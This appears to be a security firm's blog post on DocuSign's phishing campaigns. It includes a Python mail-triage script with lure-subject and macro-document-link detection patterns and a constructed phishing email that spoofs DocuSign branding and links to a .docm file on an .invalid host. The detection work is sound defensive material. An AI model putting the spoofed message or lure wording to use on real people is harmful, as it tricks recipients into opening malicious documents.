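DocuSign’s notices above give a mail filter two things to key on: the claim of DocuSign branding from a domain DocuSign does not send from, and the lure subjects of the three campaigns. As an added example (not DocuSign’s code), the following triages a raw message on those traits plus the macro-document link the campaigns used. The legitimate sender domains are an assumption for illustration, since the copy of DocuSign’s notice above lost them; the two sample messages are constructed with .invalid hostnames.

```python
"""Triage DocuSign-themed mail on sender domain plus the lure traits DocuSign published.

Added example, not DocuSign's code. LEGIT_SENDER_DOMAINS is an assumption for
illustration (the copy of DocuSign's notice above lost the domains); the subject
patterns follow the three campaigns in the notice. Sample messages are
constructed with .invalid hostnames.
"""
import email
import re
from email import policy
from email.utils import parseaddr

LEGIT_SENDER_DOMAINS = {"docusign.net", "docusign.com"}   # assumed; use the vendor's published list
BRAND = "docusign"
SUBJECT_LURES = [re.compile(p, re.I) for p in (
    r"wire transfer instructions for .* document ready for signature",
    r"accounting invoice .* document ready for signature",
    r"legal acknowledgement for .* document is ready for signature",
)]
# A link straight to a macro-capable Office file is the payload all three campaigns used.
MACRO_DOC_LINK = re.compile(r"https?://\S+?\.(?:docm?|dotm|xlsm?)\b", re.I)


def triage(raw_message):
    """Return {'verdict': 'phish' | 'suspicious' | 'ok', 'reasons': [...]} for one RFC 822 message."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    display_name, addr = parseaddr(str(msg.get("From", "")))
    domain = addr.rpartition("@")[2].lower()
    subject = str(msg.get("Subject", ""))
    part = msg.get_body(preferencelist=("plain", "html"))
    body = part.get_content() if part is not None else ""

    reasons = []
    claims_brand = BRAND in display_name.lower() or BRAND in subject.lower()
    if claims_brand and domain not in LEGIT_SENDER_DOMAINS:
        reasons.append(f"{BRAND} branding but sent from {domain or '<no address>'}")
    if any(p.search(subject) for p in SUBJECT_LURES):
        reasons.append("subject matches a published campaign lure")
    if MACRO_DOC_LINK.search(body):
        reasons.append("links directly to a macro-capable Office document")

    # Two independent traits make it a phish; one alone goes to a human.
    verdict = "phish" if len(reasons) >= 2 else "suspicious" if reasons else "ok"
    return {"verdict": verdict, "reasons": reasons}


# Constructed messages; docusign-mail.invalid and docs-signature.invalid are not real hosts.
PHISH = """\
From: "DocuSign Electronic Signature Service" <noreply@docusign-mail.invalid>
To: ap@example.org
Subject: Completed: - Wire Transfer Instructions for Jane Doe Document Ready for Signature
Content-Type: text/plain; charset="utf-8"

Your document is ready. Review and sign here: http://docs-signature.invalid/view/Wire_2271.docm
"""

LEGIT = """\
From: "Jane Doe via DocuSign" <dse@docusign.net>
To: ap@example.org
Subject: Please DocuSign: Vendor Agreement.pdf
Content-Type: text/plain; charset="utf-8"

Jane Doe sent you a document to review and sign from her DocuSign account.
"""

if __name__ == "__main__":
    for name, raw in (("PHISH", PHISH), ("LEGIT", LEGIT)):
        print(name, triage(raw))
```

The sender-domain check is the one that survives the attackers changing their subject lines, which is exactly what happened across the 5/9, 5/15 and 5/16 campaigns; the lure patterns are there to catch the day-one wave before anyone has updated anything.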

The Lesson You Can Learn

“However, as part of our ongoing investigation, today we confirmed that a malicious third party had gained temporary access to a separate, non-core communication system used for service-related announcements that contained a list of email addresses.” (Emphasis added)

The lesson to be learned here is that in today’s world no part of your network can be considered “non-core” when it comes to security. If the data is worth saving within your network, it is worth protecting!

Konsultek and Its Partners

Konsultek and its partners like Proofpoint, CheckPoint, ForeScout, CarbonBlack and many others work together to build custom security solutions for businesses of all sizes in all markets. When you’re ready to learn about your network vulnerabilities and how to correct them please give us a call.


© Copyright 2018 Konsultek